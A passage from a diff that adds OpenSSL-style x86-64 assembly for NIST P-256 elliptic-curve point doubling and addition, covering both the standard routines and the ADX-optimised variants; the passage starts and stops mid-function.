+	leaq	0-0(%rsp),%rsi
+	cmovzq	%r9,%r12
+	movq	%r9,0+24(%rsp)
+	movq	%r14,%r9
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+.byte	102,72,15,126,203
+.byte	102,72,15,126,207
+	call	__ecp_nistz256_sub_fromq
+
+	addq	$160+8,%rsp
+	popq	%r15
+	popq	%r14
+	popq	%r13
+	popq	%r12
+	popq	%rbx
+	popq	%rbp
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_point_double,.-ecp_nistz256_point_double
+.globl	ecp_nistz256_point_add
+.type	ecp_nistz256_point_add,@function
+.align	32
+ecp_nistz256_point_add:
+	movl	$524544,%ecx
+	andl	OPENSSL_ia32cap_P+8(%rip),%ecx
+	cmpl	$524544,%ecx
+	je	.Lpoint_addx
+	pushq	%rbp
+	pushq	%rbx
+	pushq	%r12
+	pushq	%r13
+	pushq	%r14
+	pushq	%r15
+	subq	$576+8,%rsp
+
+	movdqu	0(%rsi),%xmm0
+	movdqu	16(%rsi),%xmm1
+	movdqu	32(%rsi),%xmm2
+	movdqu	48(%rsi),%xmm3
+	movdqu	64(%rsi),%xmm4
+	movdqu	80(%rsi),%xmm5
+	movq	%rsi,%rbx
+	movq	%rdx,%rsi
+	movdqa	%xmm0,384(%rsp)
+	movdqa	%xmm1,384+16(%rsp)
+	por	%xmm0,%xmm1
+	movdqa	%xmm2,416(%rsp)
+	movdqa	%xmm3,416+16(%rsp)
+	por	%xmm2,%xmm3
+	movdqa	%xmm4,448(%rsp)
+	movdqa	%xmm5,448+16(%rsp)
+	por	%xmm1,%xmm3
+
+	movdqu	0(%rsi),%xmm0
+	pshufd	$177,%xmm3,%xmm5
+	movdqu	16(%rsi),%xmm1
+	movdqu	32(%rsi),%xmm2
+	por	%xmm3,%xmm5
+	movdqu	48(%rsi),%xmm3
+	movq	64+0(%rsi),%rax
+	movq	64+8(%rsi),%r14
+	movq	64+16(%rsi),%r15
+	movq	64+24(%rsi),%r8
+	movdqa	%xmm0,480(%rsp)
+	pshufd	$30,%xmm5,%xmm4
+	movdqa	%xmm1,480+16(%rsp)
+	por	%xmm0,%xmm1
+.byte	102,72,15,110,199
+	movdqa	%xmm2,512(%rsp)
+	movdqa	%xmm3,512+16(%rsp)
+	por	%xmm2,%xmm3
+	por	%xmm4,%xmm5
+	pxor	%xmm4,%xmm4
+	por	%xmm1,%xmm3
+
+	leaq	64-0(%rsi),%rsi
+	movq	%rax,544+0(%rsp)
+	movq	%r14,544+8(%rsp)
+	movq	%r15,544+16(%rsp)
+	movq	%r8,544+24(%rsp)
+	leaq	96(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montq
+
+	pcmpeqd	%xmm4,%xmm5
+	pshufd	$177,%xmm3,%xmm4
+	por	%xmm3,%xmm4
+	pshufd	$0,%xmm5,%xmm5
+	pshufd	$30,%xmm4,%xmm3
+	por	%xmm3,%xmm4
+	pxor	%xmm3,%xmm3
+	pcmpeqd	%xmm3,%xmm4
+	pshufd	$0,%xmm4,%xmm4
+	movq	64+0(%rbx),%rax
+	movq	64+8(%rbx),%r14
+	movq	64+16(%rbx),%r15
+	movq	64+24(%rbx),%r8
+
+	leaq	64-0(%rbx),%rsi
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montq
+
+	movq	544(%rsp),%rax
+	leaq	544(%rsp),%rbx
+	movq	0+96(%rsp),%r9
+	movq	8+96(%rsp),%r10
+	leaq	0+96(%rsp),%rsi
+	movq	16+96(%rsp),%r11
+	movq	24+96(%rsp),%r12
+	leaq	224(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	movq	448(%rsp),%rax
+	leaq	448(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	0+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	256(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	movq	416(%rsp),%rax
+	leaq	416(%rsp),%rbx
+	movq	0+224(%rsp),%r9
+	movq	8+224(%rsp),%r10
+	leaq	0+224(%rsp),%rsi
+	movq	16+224(%rsp),%r11
+	movq	24+224(%rsp),%r12
+	leaq	224(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	movq	512(%rsp),%rax
+	leaq	512(%rsp),%rbx
+	movq	0+256(%rsp),%r9
+	movq	8+256(%rsp),%r10
+	leaq	0+256(%rsp),%rsi
+	movq	16+256(%rsp),%r11
+	movq	24+256(%rsp),%r12
+	leaq	256(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	leaq	224(%rsp),%rbx
+	leaq	64(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromq
+
+	orq	%r13,%r12
+	movdqa	%xmm4,%xmm2
+	orq	%r8,%r12
+	orq	%r9,%r12
+	por	%xmm5,%xmm2
+.byte	102,73,15,110,220
+
+	movq	384(%rsp),%rax
+	leaq	384(%rsp),%rbx
+	movq	0+96(%rsp),%r9
+	movq	8+96(%rsp),%r10
+	leaq	0+96(%rsp),%rsi
+	movq	16+96(%rsp),%r11
+	movq	24+96(%rsp),%r12
+	leaq	160(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	movq	480(%rsp),%rax
+	leaq	480(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	0+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	192(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	leaq	160(%rsp),%rbx
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromq
+
+	orq	%r13,%r12
+	orq	%r8,%r12
+	orq	%r9,%r12
+
+.byte	0x3e
+	jnz	.Ladd_proceedq
+.byte	102,73,15,126,208
+.byte	102,73,15,126,217
+	testq	%r8,%r8
+	jnz	.Ladd_proceedq
+	testq	%r9,%r9
+	jz	.Ladd_proceedq
+
+.byte	102,72,15,126,199
+	pxor	%xmm0,%xmm0
+	movdqu	%xmm0,0(%rdi)
+	movdqu	%xmm0,16(%rdi)
+	movdqu	%xmm0,32(%rdi)
+	movdqu	%xmm0,48(%rdi)
+	movdqu	%xmm0,64(%rdi)
+	movdqu	%xmm0,80(%rdi)
+	jmp	.Ladd_doneq
+
+.align	32
+.Ladd_proceedq:
+	movq	0+64(%rsp),%rax
+	movq	8+64(%rsp),%r14
+	leaq	0+64(%rsp),%rsi
+	movq	16+64(%rsp),%r15
+	movq	24+64(%rsp),%r8
+	leaq	96(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montq
+
+	movq	448(%rsp),%rax
+	leaq	448(%rsp),%rbx
+	movq	0+0(%rsp),%r9
+	movq	8+0(%rsp),%r10
+	leaq	0+0(%rsp),%rsi
+	movq	16+0(%rsp),%r11
+	movq	24+0(%rsp),%r12
+	leaq	352(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	movq	0+0(%rsp),%rax
+	movq	8+0(%rsp),%r14
+	leaq	0+0(%rsp),%rsi
+	movq	16+0(%rsp),%r15
+	movq	24+0(%rsp),%r8
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montq
+
+	movq	544(%rsp),%rax
+	leaq	544(%rsp),%rbx
+	movq	0+352(%rsp),%r9
+	movq	8+352(%rsp),%r10
+	leaq	0+352(%rsp),%rsi
+	movq	16+352(%rsp),%r11
+	movq	24+352(%rsp),%r12
+	leaq	352(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	movq	0(%rsp),%rax
+	leaq	0(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	0+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	128(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	movq	160(%rsp),%rax
+	leaq	160(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	0+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	192(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+
+
+
+	addq	%r12,%r12
+	leaq	96(%rsp),%rsi
+	adcq	%r13,%r13
+	movq	%r12,%rax
+	adcq	%r8,%r8
+	adcq	%r9,%r9
+	movq	%r13,%rbp
+	sbbq	%r11,%r11
+
+	subq	$-1,%r12
+	movq	%r8,%rcx
+	sbbq	%r14,%r13
+	sbbq	$0,%r8
+	movq	%r9,%r10
+	sbbq	%r15,%r9
+	testq	%r11,%r11
+
+	cmovzq	%rax,%r12
+	movq	0(%rsi),%rax
+	cmovzq	%rbp,%r13
+	movq	8(%rsi),%rbp
+	cmovzq	%rcx,%r8
+	movq	16(%rsi),%rcx
+	cmovzq	%r10,%r9
+	movq	24(%rsi),%r10
+
+	call	__ecp_nistz256_subq
+
+	leaq	128(%rsp),%rbx
+	leaq	288(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromq
+
+	movq	192+0(%rsp),%rax
+	movq	192+8(%rsp),%rbp
+	movq	192+16(%rsp),%rcx
+	movq	192+24(%rsp),%r10
+	leaq	320(%rsp),%rdi
+
+	call	__ecp_nistz256_subq
+
+	movq	%r12,0(%rdi)
+	movq	%r13,8(%rdi)
+	movq	%r8,16(%rdi)
+	movq	%r9,24(%rdi)
+	movq	128(%rsp),%rax
+	leaq	128(%rsp),%rbx
+	movq	0+224(%rsp),%r9
+	movq	8+224(%rsp),%r10
+	leaq	0+224(%rsp),%rsi
+	movq	16+224(%rsp),%r11
+	movq	24+224(%rsp),%r12
+	leaq	256(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	movq	320(%rsp),%rax
+	leaq	320(%rsp),%rbx
+	movq	0+64(%rsp),%r9
+	movq	8+64(%rsp),%r10
+	leaq	0+64(%rsp),%rsi
+	movq	16+64(%rsp),%r11
+	movq	24+64(%rsp),%r12
+	leaq	320(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	leaq	256(%rsp),%rbx
+	leaq	320(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromq
+
+.byte	102,72,15,126,199
+
+	movdqa	%xmm5,%xmm0
+	movdqa	%xmm5,%xmm1
+	pandn	352(%rsp),%xmm0
+	movdqa	%xmm5,%xmm2
+	pandn	352+16(%rsp),%xmm1
+	movdqa	%xmm5,%xmm3
+	pand	544(%rsp),%xmm2
+	pand	544+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+
+	movdqa	%xmm4,%xmm0
+	movdqa	%xmm4,%xmm1
+	pandn	%xmm2,%xmm0
+	movdqa	%xmm4,%xmm2
+	pandn	%xmm3,%xmm1
+	movdqa	%xmm4,%xmm3
+	pand	448(%rsp),%xmm2
+	pand	448+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+	movdqu	%xmm2,64(%rdi)
+	movdqu	%xmm3,80(%rdi)
+
+	movdqa	%xmm5,%xmm0
+	movdqa	%xmm5,%xmm1
+	pandn	288(%rsp),%xmm0
+	movdqa	%xmm5,%xmm2
+	pandn	288+16(%rsp),%xmm1
+	movdqa	%xmm5,%xmm3
+	pand	480(%rsp),%xmm2
+	pand	480+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+
+	movdqa	%xmm4,%xmm0
+	movdqa	%xmm4,%xmm1
+	pandn	%xmm2,%xmm0
+	movdqa	%xmm4,%xmm2
+	pandn	%xmm3,%xmm1
+	movdqa	%xmm4,%xmm3
+	pand	384(%rsp),%xmm2
+	pand	384+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+	movdqu	%xmm2,0(%rdi)
+	movdqu	%xmm3,16(%rdi)
+
+	movdqa	%xmm5,%xmm0
+	movdqa	%xmm5,%xmm1
+	pandn	320(%rsp),%xmm0
+	movdqa	%xmm5,%xmm2
+	pandn	320+16(%rsp),%xmm1
+	movdqa	%xmm5,%xmm3
+	pand	512(%rsp),%xmm2
+	pand	512+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+
+	movdqa	%xmm4,%xmm0
+	movdqa	%xmm4,%xmm1
+	pandn	%xmm2,%xmm0
+	movdqa	%xmm4,%xmm2
+	pandn	%xmm3,%xmm1
+	movdqa	%xmm4,%xmm3
+	pand	416(%rsp),%xmm2
+	pand	416+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+	movdqu	%xmm2,32(%rdi)
+	movdqu	%xmm3,48(%rdi)
+
+.Ladd_doneq:
+	addq	$576+8,%rsp
+	popq	%r15
+	popq	%r14
+	popq	%r13
+	popq	%r12
+	popq	%rbx
+	popq	%rbp
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_point_add,.-ecp_nistz256_point_add
+.globl	ecp_nistz256_point_add_affine
+.type	ecp_nistz256_point_add_affine,@function
+.align	32
+ecp_nistz256_point_add_affine:
+	movl	$524544,%ecx
+	andl	OPENSSL_ia32cap_P+8(%rip),%ecx
+	cmpl	$524544,%ecx
+	je	.Lpoint_add_affinex
+	pushq	%rbp
+	pushq	%rbx
+	pushq	%r12
+	pushq	%r13
+	pushq	%r14
+	pushq	%r15
+	subq	$480+8,%rsp
+
+	movdqu	0(%rsi),%xmm0
+	movq	%rdx,%rbx
+	movdqu	16(%rsi),%xmm1
+	movdqu	32(%rsi),%xmm2
+	movdqu	48(%rsi),%xmm3
+	movdqu	64(%rsi),%xmm4
+	movdqu	80(%rsi),%xmm5
+	movq	64+0(%rsi),%rax
+	movq	64+8(%rsi),%r14
+	movq	64+16(%rsi),%r15
+	movq	64+24(%rsi),%r8
+	movdqa	%xmm0,320(%rsp)
+	movdqa	%xmm1,320+16(%rsp)
+	por	%xmm0,%xmm1
+	movdqa	%xmm2,352(%rsp)
+	movdqa	%xmm3,352+16(%rsp)
+	por	%xmm2,%xmm3
+	movdqa	%xmm4,384(%rsp)
+	movdqa	%xmm5,384+16(%rsp)
+	por	%xmm1,%xmm3
+
+	movdqu	0(%rbx),%xmm0
+	pshufd	$177,%xmm3,%xmm5
+	movdqu	16(%rbx),%xmm1
+	movdqu	32(%rbx),%xmm2
+	por	%xmm3,%xmm5
+	movdqu	48(%rbx),%xmm3
+	movdqa	%xmm0,416(%rsp)
+	pshufd	$30,%xmm5,%xmm4
+	movdqa	%xmm1,416+16(%rsp)
+	por	%xmm0,%xmm1
+.byte	102,72,15,110,199
+	movdqa	%xmm2,448(%rsp)
+	movdqa	%xmm3,448+16(%rsp)
+	por	%xmm2,%xmm3
+	por	%xmm4,%xmm5
+	pxor	%xmm4,%xmm4
+	por	%xmm1,%xmm3
+
+	leaq	64-0(%rsi),%rsi
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montq
+
+	pcmpeqd	%xmm4,%xmm5
+	pshufd	$177,%xmm3,%xmm4
+	movq	0(%rbx),%rax
+
+	movq	%r12,%r9
+	por	%xmm3,%xmm4
+	pshufd	$0,%xmm5,%xmm5
+	pshufd	$30,%xmm4,%xmm3
+	movq	%r13,%r10
+	por	%xmm3,%xmm4
+	pxor	%xmm3,%xmm3
+	movq	%r14,%r11
+	pcmpeqd	%xmm3,%xmm4
+	pshufd	$0,%xmm4,%xmm4
+
+	leaq	32-0(%rsp),%rsi
+	movq	%r15,%r12
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	leaq	320(%rsp),%rbx
+	leaq	64(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromq
+
+	movq	384(%rsp),%rax
+	leaq	384(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	0+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	movq	384(%rsp),%rax
+	leaq	384(%rsp),%rbx
+	movq	0+64(%rsp),%r9
+	movq	8+64(%rsp),%r10
+	leaq	0+64(%rsp),%rsi
+	movq	16+64(%rsp),%r11
+	movq	24+64(%rsp),%r12
+	leaq	288(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	movq	448(%rsp),%rax
+	leaq	448(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	0+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	leaq	352(%rsp),%rbx
+	leaq	96(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromq
+
+	movq	0+64(%rsp),%rax
+	movq	8+64(%rsp),%r14
+	leaq	0+64(%rsp),%rsi
+	movq	16+64(%rsp),%r15
+	movq	24+64(%rsp),%r8
+	leaq	128(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montq
+
+	movq	0+96(%rsp),%rax
+	movq	8+96(%rsp),%r14
+	leaq	0+96(%rsp),%rsi
+	movq	16+96(%rsp),%r15
+	movq	24+96(%rsp),%r8
+	leaq	192(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montq
+
+	movq	128(%rsp),%rax
+	leaq	128(%rsp),%rbx
+	movq	0+64(%rsp),%r9
+	movq	8+64(%rsp),%r10
+	leaq	0+64(%rsp),%rsi
+	movq	16+64(%rsp),%r11
+	movq	24+64(%rsp),%r12
+	leaq	160(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	movq	320(%rsp),%rax
+	leaq	320(%rsp),%rbx
+	movq	0+128(%rsp),%r9
+	movq	8+128(%rsp),%r10
+	leaq	0+128(%rsp),%rsi
+	movq	16+128(%rsp),%r11
+	movq	24+128(%rsp),%r12
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+
+
+
+	addq	%r12,%r12
+	leaq	192(%rsp),%rsi
+	adcq	%r13,%r13
+	movq	%r12,%rax
+	adcq	%r8,%r8
+	adcq	%r9,%r9
+	movq	%r13,%rbp
+	sbbq	%r11,%r11
+
+	subq	$-1,%r12
+	movq	%r8,%rcx
+	sbbq	%r14,%r13
+	sbbq	$0,%r8
+	movq	%r9,%r10
+	sbbq	%r15,%r9
+	testq	%r11,%r11
+
+	cmovzq	%rax,%r12
+	movq	0(%rsi),%rax
+	cmovzq	%rbp,%r13
+	movq	8(%rsi),%rbp
+	cmovzq	%rcx,%r8
+	movq	16(%rsi),%rcx
+	cmovzq	%r10,%r9
+	movq	24(%rsi),%r10
+
+	call	__ecp_nistz256_subq
+
+	leaq	160(%rsp),%rbx
+	leaq	224(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromq
+
+	movq	0+0(%rsp),%rax
+	movq	0+8(%rsp),%rbp
+	movq	0+16(%rsp),%rcx
+	movq	0+24(%rsp),%r10
+	leaq	64(%rsp),%rdi
+
+	call	__ecp_nistz256_subq
+
+	movq	%r12,0(%rdi)
+	movq	%r13,8(%rdi)
+	movq	%r8,16(%rdi)
+	movq	%r9,24(%rdi)
+	movq	352(%rsp),%rax
+	leaq	352(%rsp),%rbx
+	movq	0+160(%rsp),%r9
+	movq	8+160(%rsp),%r10
+	leaq	0+160(%rsp),%rsi
+	movq	16+160(%rsp),%r11
+	movq	24+160(%rsp),%r12
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	movq	96(%rsp),%rax
+	leaq	96(%rsp),%rbx
+	movq	0+64(%rsp),%r9
+	movq	8+64(%rsp),%r10
+	leaq	0+64(%rsp),%rsi
+	movq	16+64(%rsp),%r11
+	movq	24+64(%rsp),%r12
+	leaq	64(%rsp),%rdi
+	call	__ecp_nistz256_mul_montq
+
+	leaq	32(%rsp),%rbx
+	leaq	256(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromq
+
+.byte	102,72,15,126,199
+
+	movdqa	%xmm5,%xmm0
+	movdqa	%xmm5,%xmm1
+	pandn	288(%rsp),%xmm0
+	movdqa	%xmm5,%xmm2
+	pandn	288+16(%rsp),%xmm1
+	movdqa	%xmm5,%xmm3
+	pand	.LONE_mont(%rip),%xmm2
+	pand	.LONE_mont+16(%rip),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+
+	movdqa	%xmm4,%xmm0
+	movdqa	%xmm4,%xmm1
+	pandn	%xmm2,%xmm0
+	movdqa	%xmm4,%xmm2
+	pandn	%xmm3,%xmm1
+	movdqa	%xmm4,%xmm3
+	pand	384(%rsp),%xmm2
+	pand	384+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+	movdqu	%xmm2,64(%rdi)
+	movdqu	%xmm3,80(%rdi)
+
+	movdqa	%xmm5,%xmm0
+	movdqa	%xmm5,%xmm1
+	pandn	224(%rsp),%xmm0
+	movdqa	%xmm5,%xmm2
+	pandn	224+16(%rsp),%xmm1
+	movdqa	%xmm5,%xmm3
+	pand	416(%rsp),%xmm2
+	pand	416+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+
+	movdqa	%xmm4,%xmm0
+	movdqa	%xmm4,%xmm1
+	pandn	%xmm2,%xmm0
+	movdqa	%xmm4,%xmm2
+	pandn	%xmm3,%xmm1
+	movdqa	%xmm4,%xmm3
+	pand	320(%rsp),%xmm2
+	pand	320+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+	movdqu	%xmm2,0(%rdi)
+	movdqu	%xmm3,16(%rdi)
+
+	movdqa	%xmm5,%xmm0
+	movdqa	%xmm5,%xmm1
+	pandn	256(%rsp),%xmm0
+	movdqa	%xmm5,%xmm2
+	pandn	256+16(%rsp),%xmm1
+	movdqa	%xmm5,%xmm3
+	pand	448(%rsp),%xmm2
+	pand	448+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+
+	movdqa	%xmm4,%xmm0
+	movdqa	%xmm4,%xmm1
+	pandn	%xmm2,%xmm0
+	movdqa	%xmm4,%xmm2
+	pandn	%xmm3,%xmm1
+	movdqa	%xmm4,%xmm3
+	pand	352(%rsp),%xmm2
+	pand	352+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+	movdqu	%xmm2,32(%rdi)
+	movdqu	%xmm3,48(%rdi)
+
+	addq	$480+8,%rsp
+	popq	%r15
+	popq	%r14
+	popq	%r13
+	popq	%r12
+	popq	%rbx
+	popq	%rbp
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_point_add_affine,.-ecp_nistz256_point_add_affine
+.type	__ecp_nistz256_add_tox,@function
+.align	32
+__ecp_nistz256_add_tox:
+	xorq	%r11,%r11
+	adcq	0(%rbx),%r12
+	adcq	8(%rbx),%r13
+	movq	%r12,%rax
+	adcq	16(%rbx),%r8
+	adcq	24(%rbx),%r9
+	movq	%r13,%rbp
+	adcq	$0,%r11
+
+	xorq	%r10,%r10
+	sbbq	$-1,%r12
+	movq	%r8,%rcx
+	sbbq	%r14,%r13
+	sbbq	$0,%r8
+	movq	%r9,%r10
+	sbbq	%r15,%r9
+
+	btq	$0,%r11
+	cmovncq	%rax,%r12
+	cmovncq	%rbp,%r13
+	movq	%r12,0(%rdi)
+	cmovncq	%rcx,%r8
+	movq	%r13,8(%rdi)
+	cmovncq	%r10,%r9
+	movq	%r8,16(%rdi)
+	movq	%r9,24(%rdi)
+
+	.byte	0xf3,0xc3
+.size	__ecp_nistz256_add_tox,.-__ecp_nistz256_add_tox
+
+.type	__ecp_nistz256_sub_fromx,@function
+.align	32
+__ecp_nistz256_sub_fromx:
+	xorq	%r11,%r11
+	sbbq	0(%rbx),%r12
+	sbbq	8(%rbx),%r13
+	movq	%r12,%rax
+	sbbq	16(%rbx),%r8
+	sbbq	24(%rbx),%r9
+	movq	%r13,%rbp
+	sbbq	$0,%r11
+
+	xorq	%r10,%r10
+	adcq	$-1,%r12
+	movq	%r8,%rcx
+	adcq	%r14,%r13
+	adcq	$0,%r8
+	movq	%r9,%r10
+	adcq	%r15,%r9
+
+	btq	$0,%r11
+	cmovncq	%rax,%r12
+	cmovncq	%rbp,%r13
+	movq	%r12,0(%rdi)
+	cmovncq	%rcx,%r8
+	movq	%r13,8(%rdi)
+	cmovncq	%r10,%r9
+	movq	%r8,16(%rdi)
+	movq	%r9,24(%rdi)
+
+	.byte	0xf3,0xc3
+.size	__ecp_nistz256_sub_fromx,.-__ecp_nistz256_sub_fromx
+
+.type	__ecp_nistz256_subx,@function
+.align	32
+__ecp_nistz256_subx:
+	xorq	%r11,%r11
+	sbbq	%r12,%rax
+	sbbq	%r13,%rbp
+	movq	%rax,%r12
+	sbbq	%r8,%rcx
+	sbbq	%r9,%r10
+	movq	%rbp,%r13
+	sbbq	$0,%r11
+
+	xorq	%r9,%r9
+	adcq	$-1,%rax
+	movq	%rcx,%r8
+	adcq	%r14,%rbp
+	adcq	$0,%rcx
+	movq	%r10,%r9
+	adcq	%r15,%r10
+
+	btq	$0,%r11
+	cmovcq	%rax,%r12
+	cmovcq	%rbp,%r13
+	cmovcq	%rcx,%r8
+	cmovcq	%r10,%r9
+
+	.byte	0xf3,0xc3
+.size	__ecp_nistz256_subx,.-__ecp_nistz256_subx
+
+.type	__ecp_nistz256_mul_by_2x,@function
+.align	32
+__ecp_nistz256_mul_by_2x:
+	xorq	%r11,%r11
+	adcq	%r12,%r12
+	adcq	%r13,%r13
+	movq	%r12,%rax
+	adcq	%r8,%r8
+	adcq	%r9,%r9
+	movq	%r13,%rbp
+	adcq	$0,%r11
+
+	xorq	%r10,%r10
+	sbbq	$-1,%r12
+	movq	%r8,%rcx
+	sbbq	%r14,%r13
+	sbbq	$0,%r8
+	movq	%r9,%r10
+	sbbq	%r15,%r9
+
+	btq	$0,%r11
+	cmovncq	%rax,%r12
+	cmovncq	%rbp,%r13
+	movq	%r12,0(%rdi)
+	cmovncq	%rcx,%r8
+	movq	%r13,8(%rdi)
+	cmovncq	%r10,%r9
+	movq	%r8,16(%rdi)
+	movq	%r9,24(%rdi)
+
+	.byte	0xf3,0xc3
+.size	__ecp_nistz256_mul_by_2x,.-__ecp_nistz256_mul_by_2x
+.type	ecp_nistz256_point_doublex,@function
+.align	32
+ecp_nistz256_point_doublex:
+.Lpoint_doublex:
+	pushq	%rbp
+	pushq	%rbx
+	pushq	%r12
+	pushq	%r13
+	pushq	%r14
+	pushq	%r15
+	subq	$160+8,%rsp
+
+	movdqu	0(%rsi),%xmm0
+	movq	%rsi,%rbx
+	movdqu	16(%rsi),%xmm1
+	movq	32+0(%rsi),%r12
+	movq	32+8(%rsi),%r13
+	movq	32+16(%rsi),%r8
+	movq	32+24(%rsi),%r9
+	movq	.Lpoly+8(%rip),%r14
+	movq	.Lpoly+24(%rip),%r15
+	movdqa	%xmm0,96(%rsp)
+	movdqa	%xmm1,96+16(%rsp)
+	leaq	32(%rdi),%r10
+	leaq	64(%rdi),%r11
+.byte	102,72,15,110,199
+.byte	102,73,15,110,202
+.byte	102,73,15,110,211
+
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_mul_by_2x
+
+	movq	64+0(%rsi),%rdx
+	movq	64+8(%rsi),%r14
+	movq	64+16(%rsi),%r15
+	movq	64+24(%rsi),%r8
+	leaq	64-128(%rsi),%rsi
+	leaq	64(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montx
+
+	movq	0+0(%rsp),%rdx
+	movq	8+0(%rsp),%r14
+	leaq	-128+0(%rsp),%rsi
+	movq	16+0(%rsp),%r15
+	movq	24+0(%rsp),%r8
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montx
+
+	movq	32(%rbx),%rdx
+	movq	64+0(%rbx),%r9
+	movq	64+8(%rbx),%r10
+	movq	64+16(%rbx),%r11
+	movq	64+24(%rbx),%r12
+	leaq	64-128(%rbx),%rsi
+	leaq	32(%rbx),%rbx
+.byte	102,72,15,126,215
+	call	__ecp_nistz256_mul_montx
+	call	__ecp_nistz256_mul_by_2x
+
+	movq	96+0(%rsp),%r12
+	movq	96+8(%rsp),%r13
+	leaq	64(%rsp),%rbx
+	movq	96+16(%rsp),%r8
+	movq	96+24(%rsp),%r9
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_add_tox
+
+	movq	96+0(%rsp),%r12
+	movq	96+8(%rsp),%r13
+	leaq	64(%rsp),%rbx
+	movq	96+16(%rsp),%r8
+	movq	96+24(%rsp),%r9
+	leaq	64(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromx
+
+	movq	0+0(%rsp),%rdx
+	movq	8+0(%rsp),%r14
+	leaq	-128+0(%rsp),%rsi
+	movq	16+0(%rsp),%r15
+	movq	24+0(%rsp),%r8
+.byte	102,72,15,126,207
+	call	__ecp_nistz256_sqr_montx
+	xorq	%r9,%r9
+	movq	%r12,%rax
+	addq	$-1,%r12
+	movq	%r13,%r10
+	adcq	%rsi,%r13
+	movq	%r14,%rcx
+	adcq	$0,%r14
+	movq	%r15,%r8
+	adcq	%rbp,%r15
+	adcq	$0,%r9
+	xorq	%rsi,%rsi
+	testq	$1,%rax
+
+	cmovzq	%rax,%r12
+	cmovzq	%r10,%r13
+	cmovzq	%rcx,%r14
+	cmovzq	%r8,%r15
+	cmovzq	%rsi,%r9
+
+	movq	%r13,%rax
+	shrq	$1,%r12
+	shlq	$63,%rax
+	movq	%r14,%r10
+	shrq	$1,%r13
+	orq	%rax,%r12
+	shlq	$63,%r10
+	movq	%r15,%rcx
+	shrq	$1,%r14
